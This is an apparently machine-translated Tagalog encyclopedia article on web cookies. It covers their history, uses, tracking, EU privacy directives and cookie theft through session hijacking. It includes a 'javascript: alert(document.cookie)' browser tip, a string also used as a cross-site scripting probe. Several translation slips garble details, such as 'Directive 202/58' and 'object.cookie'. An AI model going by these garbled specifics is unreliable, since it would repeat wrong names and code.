Internet Cookie: Ano ito? Kahulugan, Pinagmulan, Mga Uri at Privacy

Un cookie o web cookie (O cookie, pinaikling bilang saksi sa Quebec) ay tinukoy ng HTTP na protocol ng komunikasyon bilang isang pagkakasunud-sunod ng impormasyon na ipinadala ng isang HTTP server sa isang HTTP client, na ibinabalik ng huli sa tuwing ang parehong HTTP server ay itatanong sa ilalim ng ilang mga kundisyon.

Ang cookie ay katumbas ng a maliit na text file na nakaimbak sa terminal ng gumagamit ng Internet. Umiiral nang higit sa 20 taon, pinapayagan nila ang mga developer ng website na mag-imbak ng data ng user upang mapadali ang kanilang nabigasyon at payagan ang ilang partikular na pagpapagana. Ang cookies ay palaging higit o hindi gaanong kontrobersyal dahil naglalaman ang mga ito ng natitirang personal na impormasyon na posibleng magamit ng mga third party.

Ito ay ipinadala bilang isang HTTP header ng web server sa web browser na ibinabalik ito nang hindi nagbabago sa tuwing maa-access nito ang server. Maaaring gumamit ng cookie isang pagpapatunay, isang session (pagpapanatili ng estado), at para sa mag-imbak ng partikular na impormasyon tungkol sa gumagamit, gaya ng mga kagustuhan sa site o mga nilalaman ng isang electronic shopping cart. Ang terminong cookie ay nagmula sa magic cookie, isang kilalang konsepto sa UNIX computing, na nagbigay inspirasyon sa ideya at pangalan ng cookies ng browser. Mayroong ilang mga alternatibo sa cookies, bawat isa ay may kanya-kanyang gamit, pakinabang at disadvantages.

Bilang simpleng mga text file, hindi maipapatupad ang cookies. Hindi sila ni spyware o mga virus, bagama't ang cookies mula sa ilang mga site ay nakita ng maraming anti-virus software dahil pinapayagan ng mga ito ang mga user na masubaybayan kapag bumisita sila sa maraming site. 

Karamihan sa mga modernong browser ay nagpapahintulot sa mga user na magpasya kung tatanggapin o tatanggihan ang cookies. Maaari din ang mga gumagamit piliin kung gaano katagal iniimbak ang cookies. Gayunpaman, ang kumpletong pagtanggi sa cookies ay ginagawang hindi magagamit ang ilang mga site. Halimbawa, mag-imbak ng mga shopping cart o site na nangangailangan ng pag-login gamit ang mga kredensyal (username at password).

Kasaysayan

Ang term cookie hango sa salitang Ingles magic cookie, na isang packet ng data na natatanggap at ibinabalik ng isang programa nang hindi nagbabago. Nagamit na ang cookies sa IT noong Lou Montulli nagkaroon ng ideya na gamitin ang mga ito sa mga komunikasyon sa web sa Hunyo 1994. Noong panahong iyon, nagtatrabaho siya sa Netscape Communications, na bumuo ng isang e-commerce na application para sa isang kliyente. Nagbigay ang cookies ng solusyon sa problema sa pagiging maaasahan ng pagpapatupad ng virtual shopping cart ng isang tindahan.

Isinulat nina John Giannandrea at Lou Montulli ang unang detalye ng cookie ng Netscape sa parehong taon. Bersyon 0.9 beta ng Mosaic Netscape, inilabas noong Oktubre 13, 1994, pinagsama-sama teknolohiya ng cookie (tingnan ang post). Ang unang (hindi pang-eksperimentong) paggamit ng cookies ay upang matukoy kung ang mga bisita sa website ng Netscape ay bumisita sa site dati. Nag-file si Montulli ng patent application para sa cookie technology noong 1995, at ang US patent na 5774670 ay nabigyan. ipinagkaloob noong 1998.

Matapos ipatupad sa Netscape 0.9 beta noong 1994, isinama ang cookies sa Internet Explorer 2, na inilabas noong Oktubre 1995.

Ang pagpapakilala ng cookies ay hindi pa gaanong kilala sa publiko. Sa partikular, ang cookies ay tinanggap bilang default sa mga setting ng browser, at ang mga user ay hindi ipinaalam sa kanilang presensya. Alam ng ilang tao ang pagkakaroon ng cookies noong unang quarter ng 1995, ngunit ang pangkalahatang publiko ay nagkaroon lamang ng kanilang pag-iral pagkatapos na maglathala ang Financial Times ng isang artikulo noong Pebrero 12, 1996. Sa parehong taon, ang cookies ay nakatanggap ng maraming atensyon ng media dahil sa mga posibleng panghihimasok sa privacy. Ang paksa ng cookies ay tinalakay sa dalawang konsultasyon ng American Federal Trade Commission noong 1996 at 1997.

Ang pagbuo ng opisyal na detalye ng cookie ay isinasagawa na. Ang mga unang talakayan ng opisyal na detalye ay naganap noong Abril 1995 sa www-talk mailing list. Isang espesyal na grupong nagtatrabaho sa IETF ang nabuo. Dalawang alternatibong panukala para sa pagpapakilala ng estado sa mga transaksyon sa HTTP ay iminungkahi nina Brian Behlendorf at David Kristol ayon sa pagkakabanggit, ngunit ang grupo, na pinamumunuan mismo ni Kristol, ay nagpasya na gamitin ang detalye ng Netscape bilang panimulang punto. Noong Pebrero 1996, natukoy ng nagtatrabaho na grupo na ang third party na cookies ay isang malaking banta sa privacy. Ang pagtutukoy na ginawa ng grupo ay nai-publish sa kalaunan bilang RFC 2109.

Mula sa katapusan ng 2014, nakakita kami ng banner tungkol sa cookies sa maraming site. Mayroong hindi bababa sa isang extension ng browser na nagpapahintulot sa hindi ipinapakita ang banner.

Mga Uri ng Cookies at Gamit

Pamamahala ng session

Maaaring gamitin ang cookies upang mapanatili ang data ng user sa panahon ng nabigasyon, ngunit gayundin sa maraming pagbisita. Ipinakilala ang cookies upang magbigay ng paraan ng pagpapatupad ng mga electronic shopping cart, isang virtual na device kung saan maaaring maipon ng user ang mga item na gusto niyang bilhin habang nagba-browse sa site.

Sa mga araw na ito, iniimbak ng mga app tulad ng mga shopping cart ang listahan ng mga item sa isang database sa isang server, na mas gusto; kaysa i-save ang mga ito sa cookie mismo. Nagpapadala ang web server ng cookie na naglalaman ng natatanging session ID. Ibinabalik ng web browser ang session ID na ito sa bawat kasunod na kahilingan at ang mga item sa basket ay nai-save at nauugnay sa parehong natatanging session ID.

Ang madalas na paggamit ng cookies ay kapaki-pakinabang para sa pag-log in sa isang site gamit ang mga kredensyal. Sa madaling salita, nagpapadala muna ang web server ng cookie na naglalaman ng natatanging session ID. Pagkatapos ay ibibigay ng mga user ang kanilang mga kredensyal (karaniwang username at password). Ang web application pagkatapos ay nagpapatunay sa session at nagbibigay-daan sa gumagamit na ma-access ang serbisyo.

personalization

Maaaring gamitin ang cookies upang matandaan ang impormasyon tungkol sa gumagamit ng isang site, upang maipakita sa kanya ang naaangkop na nilalaman sa hinaharap. Halimbawa, ang isang web server ay maaaring magpadala ng cookie na naglalaman ng huling username na ginamit upang mag-log in sa website na iyon, upang ang username ay maaaring pre-populated sa mga pagbisita sa hinaharap.

Maraming website ang gumagamit ng cookies para sa pag-personalize batay sa mga kagustuhan ng user. Pinipili ng mga user ang kanilang mga kagustuhan sa isang form at isumite ang mga ito sa server. Ine-encode ng server ang mga kagustuhan sa isang cookie at ipapadala ito pabalik sa browser. Kasunod nito, sa tuwing maa-access ng user ang isang pahina ng site na ito, ibinabalik ng browser ang cookie at samakatuwid ay ang listahan ng mga kagustuhan; maaaring i-customize ng server ang page ayon sa mga kagustuhan ng user. Halimbawa, pinapayagan ng website ng Wikipedia ang mga user nito na piliin ang balat ng site na gusto nila. Ang Google search engine ay nagpapahintulot sa mga user nito (kahit na hindi sila nakarehistro) na piliin ang bilang ng mga resulta na gusto nilang makita sa bawat pahina ng mga resulta.

Pagsubaybay

Ang cookies sa pagsubaybay ay ginagamit upang subaybayan ang mga gawi sa pagba-browse ng mga gumagamit ng internet. Maaari din itong gawin sa bahagi sa pamamagitan ng paggamit ng IP address ng computer na humihiling para sa isang pahina o sa pamamagitan ng paggamit ng 'referrer' HTTP header na ipinapadala ng kliyente sa bawat kahilingan, ngunit pinapayagan ng cookies ang higit na katumpakan. Ito ay maaaring gawin tulad ng sa sumusunod na halimbawa:

1. Kung ang user ay tumawag sa isang page sa isang site, at ang kahilingan ay walang cookie, ang server ay ipagpalagay na ito ang unang page na binisita ng user. Lumilikha ang server ng isang random na string at ipinapadala ito sa browser kasama ang hiniling na pahina.
2. Mula sa sandaling ito, ang cookie ay awtomatikong ipapadala ng browser sa tuwing tatawagin ang isang bagong pahina ng site. Ipapadala ng server ang page gaya ng dati, ngunit ila-log din ang URL ng page na tinatawag, ang petsa, oras ng kahilingan at ang cookie sa isang log file.

Sa pamamagitan ng pagtingin sa log file, posible na makita kung aling mga pahina ang binisita ng user at sa anong pagkakasunud-sunod. Halimbawa, kung ang file ay naglalaman ng ilang mga kahilingang ginawa gamit ang id=abc cookie, ito ay maaaring magtatag na ang lahat ng mga kahilingang ito ay nagmula sa parehong user. Ang hiniling na URL, ang petsa at oras na nauugnay sa mga kahilingan ay nagpapahintulot sa pagba-browse ng user na masubaybayan.

Ang mga third-party na cookies at web beacon, na ipinaliwanag sa ibaba, ay nagbibigay-daan din sa pagsubaybay sa iba't ibang mga site. Karaniwang ginagamit ang pagsubaybay sa solong site para sa mga layuning pang-istatistika. Sa kabaligtaran, ang pagsubaybay sa iba't ibang mga site gamit ang mga third party na cookies ay karaniwang ginagamit ng mga kumpanya ng advertising upang makagawa ng mga anonymous na profile ng user (na pagkatapos ay ginagamit upang matukoy kung aling mga advertisement ang dapat ipakita sa user pati na rin upang magpadala sa kanya ng mga email na nauugnay sa mga ad na ito — SPAM ).

Ang pagsubaybay sa cookies ay isang panganib ng pagsalakay sa privacy ng user ngunit madali silang matatanggal. Karamihan sa mga modernong browser ay may kasamang opsyon na awtomatikong tanggalin ang mga patuloy na cookies kapag isinasara ang application.

Mga cookies ng third party

Ang mga imahe at iba pang mga bagay na nilalaman sa isang web page ay maaaring naninirahan sa mga server na iba sa nagho-host ng pahina. Upang ipakita ang pahina, dina-download ng browser ang lahat ng mga bagay na ito. Karamihan sa mga website ay naglalaman ng impormasyon mula sa iba't ibang mga mapagkukunan. Halimbawa, kung nagta-type ka ng www.example.com sa iyong browser, madalas na mayroong mga object o advertisement sa bahagi ng page na nagmumula sa iba't ibang source, ibig sabihin, mula sa ibang domain kaysa sa www. .example.com. Ang "First" party na cookies ay cookies na itinakda ng domain na nakalista sa address bar ng browser. Ang mga third-party na cookies ay itinakda ng isa sa mga object ng page na nagmumula sa ibang domain.

Bilang default, ang mga browser tulad ng Mozilla Firefox, Microsoft Internet Explorer at Opera ay tumatanggap ng third-party na cookies, ngunit maaaring baguhin ng mga user ang mga setting sa mga opsyon sa browser upang harangan ang mga ito. Walang panganib sa seguridad na likas sa mga third-party na cookies na nagpapagana sa paggana ng web, gayunpaman ginagamit din ang mga ito upang subaybayan ang mga user. mula sa site hanggang sa site.

Ang mga tool gaya ng Ghostery na available para sa lahat ng browser kabilang ang Google Chrome ay maaaring mag-block ng mga palitan sa pagitan ng mga third party.

Pagpapatupad

Ang cookies ay maliliit na piraso ng data na ipinadala ng web server sa browser. Ibinabalik ng browser ang mga ito nang hindi nagbabago sa server, na ipinapasok ang estado (memorya ng mga nakaraang kaganapan) sa kung hindi man ay walang estadong transaksyon sa HTTP. Kung walang cookies, ang bawat pagkuha ng isang web page o isang bahagi ng isang web page ay isang nakahiwalay na kaganapan, hiwalay sa iba pang mga kahilingang ginawa sa parehong site. Bilang karagdagan sa pagiging maaaring itakda ng web server, ang cookies ay maaari ding itakda sa pamamagitan ng pag-script ng mga wika tulad ng JavaScript, kung sinusuportahan at pinahintulutan ng browser.

Iminumungkahi ng opisyal na detalye ng cookie na ang mga browser ay dapat na makapag-save at makapagpadalang muli ng pinakamababang bilang ng cookies. Sa partikular, ang isang browser ay dapat na makapag-imbak ng hindi bababa sa 300 cookies ng apat na kilobytes bawat isa, at hindi bababa sa 20 cookies para sa isang server o domain.

Ayon sa seksyon 3.1 ng RFC 2965, ang mga pangalan ng cookie ay case-insensitive.

Maaaring tukuyin ng cookie ang petsa ng pag-expire nito, kung saan ang cookie ay tatanggalin sa petsang ito. Kung ang cookie ay hindi tumukoy ng petsa ng pag-expire, ang cookie ay tatanggalin sa sandaling umalis ang user sa kanyang browser. Samakatuwid, ang pagtukoy ng petsa ng pag-expire ay isang paraan upang mabuhay ang cookie sa maraming session. Para sa kadahilanang ito, ang cookies na may petsa ng pag-expire ay sinasabing patuloy. Isang halimbawang application: maaaring gumamit ang retail site ng patuloy na cookies para i-record ang mga item na inilagay ng mga user sa kanilang shopping cart (sa totoo lang, maaaring sumangguni ang cookie sa isang entry na naka-save sa isang database sa site ng pagbebenta, at hindi sa iyong computer) . Sa pamamagitan nito, kung umalis ang mga user sa kanilang browser nang hindi bumibili at babalik dito sa ibang pagkakataon, mahahanap nilang muli ang mga item sa cart. Kung hindi nagbigay ng expiration date ang cookies na ito, mag-e-expire ang mga ito kapag isinara ang browser, at mawawala ang impormasyon sa mga nilalaman ng basket.

Maaaring limitado ang saklaw ng cookies sa isang partikular na domain, subdomain o path sa server na lumikha sa kanila.

Paglikha ng isang cookie

Ang paglipat ng mga web page ay ginagawa gamit ang HyperText Transfer Protocol (HTTP). Sa pamamagitan ng hindi pagpansin sa cookies, ang mga browser ay tumatawag sa isang pahina mula sa mga web server sa pamamagitan ng karaniwang pagpapadala sa kanila ng isang maikling text na tinatawag Kahilingan sa HTTP. Halimbawa, upang ma-access ang pahinang www.example.org/index.html, kumokonekta ang mga browser sa server na www.example.org at magpadala ng kahilingan na ganito ang hitsura:

	GET /index.html HTTP/1.1Host: www.example.org
nabigador	→	serveur

Ang server ay tumugon sa pamamagitan ng pagpapadala ng hiniling na pahina, na sinusundan ng isang katulad na teksto, ang buong pagiging tinatawag tugon ng HTTP. Maaaring naglalaman ang packet na ito ng mga linyang nagtuturo sa browser na mag-imbak ng cookies:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML page)
nabigador	←	serveur

Ipinapadala lamang ng server ang linya ng Set-Cookie, kung gusto ng server na mag-imbak ng cookie ang browser. Ang Set-Cookie ay isang kahilingan para sa browser na iimbak ang name=value string at ibalik ito sa lahat ng mga kahilingan sa hinaharap sa server. Kung sinusuportahan ng browser ang cookies at pinagana ang cookies sa mga opsyon ng browser, isasama ang cookie sa lahat ng kasunod na kahilingang ginawa sa parehong server. Halimbawa, tinatawag ng browser ang pahinang www.example.org/news.html sa pamamagitan ng pagpapadala ng sumusunod na kahilingan sa server na www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
nabigador	→	serveur

Ito ay isang kahilingan para sa isa pang pahina mula sa parehong server, at naiiba mula sa una sa itaas dahil naglalaman ito ng isang string na dati nang ipinadala ng server sa browser. Salamat sa ibig sabihin nito, alam ng server na ang kahilingang ito ay naka-link sa nauna. Tumutugon ang server sa pamamagitan ng pagpapadala ng tinatawag na page, at gayundin sa pagdaragdag ng iba pang cookies dito.

Ang halaga ng cookie ay maaaring baguhin ng server sa pamamagitan ng pagpapadala ng bagong linyang Set-Cookie: name=new_value bilang tugon sa tinatawag na page. Pagkatapos ay pinapalitan ng browser ang lumang halaga ng bago.

Ang linya ng Set-Cookie ay kadalasang ginagawa ng isang CGI program o iba pang scripting language, hindi ng HTTP server. Ang HTTP server (halimbawa: Apache) ay magpapadala lamang ng resulta ng program (isang dokumento na pinangungunahan ng header na naglalaman ng cookies) sa browser.

Ang mga cookies ay maaari ding itakda ng JavaScript o iba pang katulad na mga wika na tumatakbo sa browser, ibig sabihin, sa panig ng kliyente sa halip na sa panig ng server. Sa JavaScript, ginagamit ang object.cookie object para sa layuning ito. Halimbawa, ang statement na document.cookie = "temperatura=20" ay lumilikha ng cookie na pinangalanang "temperatura" at may halagang 20.

Mga katangian ng isang cookie

Bilang karagdagan sa pares ng pangalan/halaga, maaari ding maglaman ang cookie ng petsa ng pag-expire, path, domain name at ang uri ng koneksyon na nilalayon, ibig sabihin, normal o naka-encrypt. Tinukoy din ng RFC 2965 na ang cookies ay dapat na may mandatoryong numero ng bersyon, ngunit ito ay karaniwang inalis. Ang mga bahagi ng data na ito ay sumusunod sa pangalan=new_value na pares at pinaghihiwalay ng mga semicolon. Halimbawa, ang isang cookie ay maaaring gawin ng server sa pamamagitan ng pagpapadala ng Set-Cookie line: name=new_value; mag-e-expire=petsa; landas=/; domain=.example.org.

Pag-expire ng isang cookie

Nag-e-expire ang cookies at pagkatapos ay hindi ipinadala ng browser sa server sa mga sumusunod na sitwasyon:

• Kapag ang browser ay sarado, kung ang cookie ay hindi paulit-ulit.
• Kapag lumipas na ang petsa ng pag-expire ng cookie.
• Kapag ang petsa ng pag-expire ng cookie ay binago (ng server o ng script) sa isang petsa sa nakaraan.
• Kapag tinanggal ng browser ang cookie sa kahilingan ng user.

Ang ikatlong sitwasyon ay nagpapahintulot sa mga server o script na tahasang magtanggal ng cookie. Tandaan na posible sa web browser ng Google Chrome na malaman ang petsa ng pag-expire ng isang partikular na cookie sa pamamagitan ng pag-access sa mga setting ng nilalaman. Ang isang cookie na naka-save sa isang computer ay maaaring manatili doon sa loob ng ilang dekada kung walang pamamaraan na gagawin upang burahin ito.

Mga stereotype

Mula sa kanilang pagpapakilala sa Internet, maraming mga ideya tungkol sa cookies ang kumalat sa Internet at sa media. Noong 1998, natukoy ng CIAC, isang koponan sa pagsubaybay sa insidente ng computer ng Departamento ng Enerhiya ng Estados Unidos, na ang mga kahinaan sa seguridad ng cookie ay "talagang wala" at ipinaliwanag na "impormasyon sa pinagmulan ng iyong mga pagbisita at ang mga detalye ng mga web page na iyong binisita. mayroon na sa mga log file ng mga web server”. Noong 2005, inilathala ng Jupiter Research ang mga resulta ng isang pag-aaral, kung saan isinasaalang-alang ng malaking porsyento ng mga sumasagot ang mga sumusunod na pahayag:

• Parang cookies virus, nahahawa nila ang mga hard drive ng mga user.
• Bumubuo ng cookies pop-up.
• Ang cookies ay ginagamit sa pagpapadala spam.
• Ang cookies ay ginagamit lamang para sa advertising.

Hindi maaaring burahin o basahin ng cookies ang impormasyon mula sa computer ng user. Gayunpaman, ginagawang posible ng cookies na makita ang mga web page na binisita ng isang user sa isang partikular na site o hanay ng mga site. Maaaring kolektahin ang impormasyong ito sa isang profile ng user na maaaring gamitin o ibenta muli sa mga third party, na maaaring magdulot ng malubhang isyu sa privacy. Ang ilang mga profile ay hindi nagpapakilala, sa diwa na naglalaman ang mga ito ng walang personal na impormasyon, ngunit kahit na ang mga naturang profile ay maaaring maging kaduda-dudang.

Ayon sa parehong pag-aaral, isang malaking porsyento ng mga gumagamit ng Internet ay hindi alam kung paano magtanggal ng cookies. Ang isa sa mga dahilan kung bakit hindi nagtitiwala ang mga tao sa cookies ay dahil inabuso ng ilang site ang personal na pagtukoy ng aspeto ng cookies at ibinahagi ang impormasyong ito sa ibang mga mapagkukunan. Malaking porsyento ng naka-target na advertising at hindi hinihinging email, na itinuturing na spam, ay nagmumula sa impormasyong nakuha mula sa pagsubaybay sa cookies.

Mga setting ng browser

Karamihan sa mga browser ay sumusuporta sa cookies at pinapayagan ang user na huwag paganahin ang mga ito. Ang pinakakaraniwang mga pagpipilian ay:

• Ganap na paganahin o huwag paganahin ang cookies, upang ang mga ito ay patuloy na tanggapin o ma-block.
• Pahintulutan ang user na makita ang aktibong cookies sa isang partikular na page, sa pamamagitan ng pagpasok ng javascript: alert(document.cookie) sa address bar ng browser. Ang ilang mga browser ay nagsasama ng isang cookie manager para sa user na maaaring tumingin at piliing magtanggal ng cookies na kasalukuyang nakaimbak ng browser.

Pinapayagan din ng karamihan sa mga browser ang buong pagtanggal ng personal na data na may kasamang cookies. Mayroon ding mga karagdagang module para makontrol ang mga pahintulot sa cookie.

Privacy at Third-Party na Cookies

Sa kathang-isip na halimbawang ito, ang isang kumpanya ng advertising ay naglagay ng mga banner sa dalawang website. Sa pamamagitan ng pagho-host ng mga banner sa mga server nito at paggamit ng cookies ng third party, nasusubaybayan ng kumpanya ng advertising ang nabigasyon ng user sa dalawang site na ito.

Ang cookies ay may mahalagang implikasyon para sa privacy at anonymity ng mga web user. Bagama't ang cookies ay ibinabalik lamang sa server na nagtakda sa kanila o sa isang server na kabilang sa parehong domain ng Internet, ang isang web page ay maaaring maglaman ng mga larawan o iba pang bahagi na nakaimbak sa mga server na kabilang sa ibang mga domain. Tinatawag ang cookies na itinakda sa panahon ng pagbawi ng mga panlabas na bahaging ito cookies ng third party. Kabilang dito ang cookies mula sa mga hindi gustong pop-up window.

Gumagamit ang mga kumpanya ng advertising ng third party na cookies upang subaybayan ang mga user sa iba't ibang site na binibisita nila. Sa partikular, masusubaybayan ng isang kumpanya ng advertising ang isang user sa lahat ng page kung saan ito naglagay ng mga larawan sa advertising o isang tracking pixel. Ang kaalaman sa mga pahinang binisita ng user ay nagpapahintulot sa kumpanya ng advertising na i-target ang mga kagustuhan sa advertising ng user.

Ang kakayahang bumuo ng profile ng user ay itinuturing ng ilan bilang isang pagsalakay sa privacy, lalo na kapag ang pagsubaybay ay ginagawa sa iba't ibang domain gamit ang third party na cookies. Dahil dito, may mga batas ng cookie ang ilang bansa.

Ang gobyerno ng Estados Unidos ay nagpatupad ng mahigpit na mga panuntunan sa paglalagay ng cookies noong 2000, matapos itong ibunyag na ang White House Drug Policy Office ay gumagamit ng cookies upang subaybayan ang mga computer ng mga user na tumitingin sa mga online na advertisement ng gamot. Noong 2002, natuklasan ng aktibista sa privacy na si Daniel Brandt na ang CIA ay nag-iwan ng patuloy na cookies sa mga computer na bumisita sa mga website nito. Sa sandaling ipaalam sa paglabag na ito, idineklara ng CIA na ang cookies na ito ay hindi sinasadyang ipinadala at itinigil ang pagtatakda nito. Noong Disyembre 25, 2005, natuklasan ni Brandt na ang National Security Agency (NSA) ay nag-iwan ng dalawang patuloy na cookies sa mga computer ng mga bisita dahil sa isang pag-update ng software. Matapos maabisuhan, agad na hindi pinagana ng NSA ang cookies.

Sa United Kingdom, ang Batas ng cookie “, na ipinatupad noong Mayo 25, 2012, ay nag-oobliga sa mga site na ipahayag ang kanilang mga intensyon, kaya pinapayagan ang mga gumagamit na pumili kung gusto nilang mag-iwan ng mga bakas o hindi ng kanilang pagpasa sa Internet. Sa gayon ay mapoprotektahan sila mula sa pag-target sa advertising. gayunpaman, ayon kay Ang tagapag-bantay, ang pahintulot ng mga gumagamit ng Internet ay hindi nangangahulugang tahasang; ang mga pagbabago ay ginawa sa mga tuntunin ng pahintulot ng user, ginagawa ito kaya ipinahiwatig.

Direktiba 2002/58 sa privacy

Ang Directive 202/58 sa privacy at electronic na komunikasyon, ay naglalaman ng mga panuntunan sa paggamit ng cookies. Sa partikular, ang artikulo 5, talata 3 ng direktiba na ito ay nangangailangan na ang pag-iimbak ng data (tulad ng cookies) sa computer ng user ay maaari lamang gawin kung:

• ang gumagamit ay alam kung paano ginagamit ang data;
• binibigyan ang user ng opsyong tanggihan ang pagpapatakbo ng storage na ito. Gayunpaman, isinasaad din ng artikulong ito na ang pag-iimbak ng data para sa mga teknikal na kadahilanan ay hindi kasama sa batas na ito.

Dahil sa ipinatupad mula Oktubre 2003, ang direktiba ay hindi ganap na naisagawa ayon sa isang ulat noong Disyembre 2004, na nagtuturo din na ang ilang mga Estadong Miyembro (Slovakia, Latvia, Greece, Belgium at Luxembourg) ay hindi pa nailipat ang direktiba sa lokal na batas.

Ayon sa opinyon ng G29 noong 2010, ang direktiba na ito, na kapansin-pansing nagkondisyon sa paggamit ng cookies para sa mga layunin ng pag-a-advertise sa pag-uugali, sa tahasang pahintulot ng gumagamit ng Internet ay nananatiling hindi gaanong inilapat. Sa katunayan, ginagawa ito ng karamihan sa mga site sa paraang hindi sumusunod sa direktiba, sa pamamagitan ng paglilimita sa kanilang sarili sa isang simpleng "banner" na nagpapaalam sa paggamit ng "cookies" nang hindi nagbibigay ng impormasyon sa mga gamit, nang walang pagkakaiba sa pagitan ng "teknikal" na cookies. "pagsubaybay" na cookies, o upang mag-alok ng tunay na pagpipilian sa user na gustong magpanatili ng teknikal na cookies (tulad ng shopping cart management cookies) at tanggihan ang "pagsubaybay" na cookies. Sa katunayan, maraming mga site ang hindi gumagana nang tama kung ang cookies ay tinanggihan, na hindi sumusunod sa direktiba 2002/58 o direktiba 95/46 (Proteksyon ng personal na data).

Direktang 2009 / 136 / CE

Ang materyal na ito ay na-update ng Directive 2009/136/EC na may petsang Nobyembre 25, 2009 na nagsasaad na ang "imbak ng impormasyon, o pagkuha ng access sa impormasyong nakaimbak na, sa terminal equipment ng isang subscriber o user ay pinahihintulutan lamang sa kondisyon na ang ang subscriber o user ay nagbigay ng kanyang pahintulot, pagkatapos matanggap, bilang pagsunod sa Directive 95/46/EC, malinaw at kumpletong impormasyon, sa pagitan ng iba sa mga layunin ng pagproseso”. Ang bagong direktiba samakatuwid ay nagpapatibay sa mga obligasyon bago maglagay ng cookies sa computer ng gumagamit ng Internet.

Sa mga paunang pagsasaalang-alang ng direktiba, tinukoy ng mambabatas sa Europa gayunpaman: "Kung saan teknikal na posible at epektibo, alinsunod sa mga nauugnay na probisyon ng Directive 95/46/EC, ang pahintulot ng user hinggil sa pagproseso ay maaaring ipahayag sa pamamagitan ng paggamit ng naaangkop na mga setting ng isang browser o iba pang application”. Ngunit sa katunayan, walang browser hanggang ngayon na ginagawang posible na ihiwalay ang mahahalagang teknikal na cookies mula sa mga opsyonal na dapat ipaubaya sa pagpili ng user.

Ang bagong direktiba na ito ay inilipat ng mga Belgian MP noong Hulyo 2012. Ipinapakita ng isang pag-aaral noong 2014 na kahit ang mga MP ay nahihirapang mag-apply ang mga hadlang ng direktiba.

P3P

Kasama sa detalye ng P3P ang kakayahan ng isang server na magsaad ng patakaran sa privacy, na tumutukoy kung anong uri ng impormasyon ang kinokolekta nito at para sa anong layunin. Kasama sa mga patakarang ito ang (ngunit hindi limitado sa) paggamit ng impormasyong nakolekta gamit ang cookies. Ayon sa mga kahulugan ng P3P, maaaring tanggapin o tanggihan ng isang browser ang cookies sa pamamagitan ng paghahambing ng mga patakaran sa privacy sa mga kagustuhan ng user o sa pamamagitan ng pagtatanong sa user, pagpapakita ng pahayag sa privacy ng patakaran sa privacy na idineklara ng server.

Maraming browser, kabilang ang Apple Safari at Microsoft Internet Explorer na bersyon 6 at 7, ang sumusuporta sa P3P na nagpapahintulot sa browser na matukoy kung tatanggap ng third party na imbakan ng cookie. Ang Opera browser ay nagbibigay-daan sa mga user na tanggihan ang mga third-party na cookies at lumikha ng isang pandaigdigan at partikular na profile ng seguridad para sa mga domain sa Internet. Ang bersyon 2 ng Mozilla Firefox ay nag-alis ng suporta sa P3P ngunit ibinalik ito sa bersyon 3.

Maaaring i-block ng karamihan sa mga browser ang cookies ng third-party upang mapataas ang privacy at mabawasan ang pagsubaybay sa ad, nang hindi negatibong naaapektuhan ang karanasan sa web ng user. Maraming mga ahensya ng advertising ang nag-aalok ng isang opsyon mag-opt out sa naka-target na pag-advertise, sa pamamagitan ng pag-set up ng generic na cookie sa browser na nagde-deactivate sa pag-target na ito, ngunit ang naturang solusyon ay hindi praktikal na epektibo, kapag ito ay iginagalang, dahil ang generic na cookie na ito ay mabubura sa sandaling tanggalin ng user ang cookies na ito na makakakansela sa pag-opt. labas ng desisyon.

Mga disadvantages ng cookies

Bilang karagdagan sa mga isyu sa privacy, ang cookies ay mayroon ding ilang mga teknikal na kakulangan. Sa partikular, hindi nila palaging tumpak na nakikilala ang mga gumagamit, maaari nilang pabagalin ang pagganap ng site kapag sa malaking bilang, maaari silang magamit para sa mga pag-atake sa seguridad, at sumasalungat sila sa paglipat ng kinatawan ng estado, estilo ng arkitektura ng software.

Hindi tumpak na pagkakakilanlan

Kung higit sa isang browser ang ginagamit sa isang computer, sa bawat isa sa kanila ay palaging may hiwalay na storage unit para sa cookies. Samakatuwid, hindi nakikilala ng cookies ang isang tao, ngunit ang kumbinasyon ng isang user account, isang computer, at isang web browser. Kaya, maaaring gamitin ng sinuman ang mga account, computer, o browser na ito na mayroong panoply ng cookies. Katulad nito, ang cookies ay hindi nag-iiba sa pagitan ng maraming user na nagbabahagi ng parehong user account, computer, at browser, tulad ng sa "mga internet cafe" o anumang lugar na nagbibigay ng libreng access sa mga mapagkukunan ng computer.

Ngunit sa pagsasagawa, ang pahayag na ito ay lumalabas na mali sa karamihan ng mga kaso dahil ngayon ang isang "personal" na computer (o isang smartphone, o tablet, na mas masahol pa) ay pangunahing ginagamit ng isang indibidwal. Ito ay katumbas ng pag-target sa isang partikular na tao at sa pamamagitan ng dami ng impormasyong nakolekta ay nakarating sa personalized na pag-target kahit na ang tao ay hindi "ibig sabihin" na natukoy.

Pagnanakaw ng cookies

Ang isang cookie ay maaaring manakaw ng isa pang computer sa network.

Sa normal na operasyon, ang cookies ay ibinabalik sa pagitan ng server (o isang pangkat ng mga server sa parehong domain) at ng computer browser ng user. Dahil ang cookies ay maaaring maglaman ng sensitibong impormasyon (username, isang password na ginamit para sa pagpapatunay, atbp.), ang kanilang mga halaga ay hindi dapat ma-access sa ibang mga computer. Ang pagnanakaw ng cookie ay isang pagkilos ng pagharang ng cookies ng isang hindi awtorisadong third party.

Maaaring manakaw ang cookies sa pamamagitan ng packet sniffer sa isang pag-atake na tinatawag na session hijacking. Ang trapiko sa net ay maaaring ma-intercept at mabasa ng mga computer maliban sa mga nagpapadala at tumatanggap (lalo na sa hindi naka-encrypt na pampublikong Wi-Fi space). Kasama sa trapikong ito ang cookies na ipinadala sa mga session gamit ang plain HTTP protocol. Kapag hindi naka-encrypt ang trapiko sa network, mababasa ng mga malisyosong user ang mga komunikasyon ng ibang mga user sa network gamit ang "mga packet sniffers".

Ang problemang ito ay maaaring malampasan sa pamamagitan ng pag-encrypt ng koneksyon sa pagitan ng computer ng user at ng server gamit ang HTTPS protocol. Maaaring tukuyin ng isang server ang isang ligtas na bandila habang nagtatakda ng cookie; ipapadala lamang ito ng browser sa isang secure na linya, gaya ng koneksyon sa SSL.

Gayunpaman maraming mga site, bagama't gumagamit ng HTTPS na naka-encrypt na komunikasyon para sa pagpapatotoo ng user (ibig sabihin, ang pahina sa pag-login), sa ibang pagkakataon ay nagpapadala ng cookies ng session at iba pang data bilang normal, sa pamamagitan ng hindi naka-encrypt na mga koneksyon sa HTTP para sa mga kadahilanang kahusayan. Ang mga umaatake ay maaaring humarang sa cookies ng ibang mga user at gayahin sila sa naaangkop na mga site o gamitin ang mga ito sa mga pag-atake ng cookie.

